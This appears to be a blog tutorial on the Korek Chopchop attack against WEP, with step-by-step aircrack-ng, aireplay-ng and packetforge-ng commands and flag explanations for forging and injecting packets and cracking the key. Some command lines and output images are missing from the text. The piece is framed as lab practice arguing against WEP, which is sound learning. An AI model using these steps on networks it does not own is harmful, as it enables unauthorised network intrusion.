It’s time to look at another WEP attack, this time Koreks Chopchop which sometimes will look like it’s working against an access point but will fail as the access point is not actually vulnerable because it drops packets shorter than 60 bytes, however if it drops packets shorter than 42 bytes aireplay-ng will try to guess the rest of the missing data as the headers are predictable. Because WEP used a short 24-bit IV that meant IV’s with the same key would be reused, IV being an initialization vector or a nonce.
This attack is a related-key attack because we can observe the operation of the cipher under several different parameters whose values are initially unknown, due to the theory behind Chopchop however there is a mathematical relationship connecting the keys.
WEP is famous for using an RC4 algorithm which is a stream cipher and cause of it’s downfall, as you may be aware security advocates have been calling for RC4 to be removed from anything that uses it like SSL as it is well and truly broken. Because of the birthday attack or birthday paradox it means that it is likely that for every 4096 packets , two will share the same IV and thus the same RC4 key which means the packets can be attacked.
The aim of the Chopchop attack like the fragmentation attack is to obtain the PRGA or pseudo random generation algorithm file which cannot be used to decrypt packets as it is not the WEP key. However, we can use it to create new packets with packetforge-ng for injection.
Let’s configure our access point like the following belowPut your card into monitor modeStart airodump-ng listening
“airodump-ng” to start airodump-ng
“mon0” for your card interface
“-c” for the channel of your access point in this case 1
“–bssid” is followed by the MAC address of the access point
“-w” writes to a file called outOutput looks like the following with one client attachedNext run aireplay-ng to do a fake authentication with the access point using your actual physical card MAC address
aireplay-ng -1 0 -e test -a 2C:B0:5D:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon0
“aireplay-ng” to start aireplay-ng
“-1” is for a fake authentication
“0” is for re-association timing in seconds and may need to be adjusted
“-a” is followed by the MAC addres of the access point
“-h” is the physical MAC address of your card
“mon0” is the interface of the wireless cardAfter the fake authentication looking at airodump-ng output again you will see you are now authenticatedNow that we have authenticated we can run a Chopchop attack with the following parameters
aireplay-ng -4 -e test -b 2C:B0:5D:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon0
“aireplay-ng” to start aireplay-ng
“-4” specifies the Chopchop attack
“-e” specifies the SSID of the access point in this case ‘test’
“-b” specifies the MAC address of the access point
“-h” is used to specify you physical wireless card MAC address
“mon0” is the interface of your wireless cardOnce the aireplay-ng Chopchop attack is running you will see the following output and accept ‘yes’ to accept a packet, you can also choose ‘no’ and accept another packet if the size is too small.When Chopchop is finished you will see something similar to the following output, you have now obtained a capture file and a xor file from Chopchop processing the packet you selected.Now you can use packetforge-ng to craft a packet of your choosing which is an arp packet in this case
“packetforge-ng” to start packetforge-ng
“-0” is to forge an arp packet
“-a” is for specifying the access point MAC address
“-h” is to specify your wireless card MAC address
“-k” is for setting the destination IP and or port in this case a broadcast 255.255.255.255
“-l” which is a lower case ‘L’ to save confusion is for setting the source and or port which is once again a broadcast 255.255.255.255
“-y” is to use the xor file obtained from the Chopchop attack to forge the packet
“-w” is to write the forged packet to a file which is called arp-requestOnce you have your packet forged from the previous step you can then inject it into the access point issuing the following aireplay-ng parameters
“aireplay-ng” will start aireplay-ng
“-2” is to run an interactive packet replay
“-r” is to select the file in which to extract packets from in which is arp-request here
“mon0” is the interface of your card to run this fromLooking at airodump-ng output now and you will see the Data and frames increasing hugely once packets start getting injected like belowNext thing to do is run aircrack-ng but something to note here is that when doing this on the Raspberry Pi 2 while running the Chopchop attack it seems to freeze injection if you do this while it is happening so it’s best to let it run and capture for a few minutes and then run aircrack-ng like so
“aircrack-ng” to start aircrack-ng
“out-0*.cap” is the capture file or files in which to run aircrack-ng against but as I had some issues here with aircrack-ng freezing the injection process I have a few extra capture files below the asterisk allows you to open multiple files at the same time
Also take note of the amount of IV’s obtained below as this will make the cracking process much easier and faster to carry outSuccess then looks like the following once aircrack-ng has cracked the keyLesson learned:
Don’t use WEP, I really cannot stress it enough and if you have been following along with these lessons you will see it is often very trivial to obtain the WEP key and there are many different attack vectors which can be carried out in order to obtain the key therefore don’t use WEP and if you know anyone who is using WEP show them how to secure themselves with a strong WPA passphrase in order to make make it harder to compromise their home or business. The Korek Chopchop attack is very interesting and is a good way to understand how WEP encryption works, it is worth carrying out this attack in your lab in order to understand WEP encryption better and why you should refrain from using it.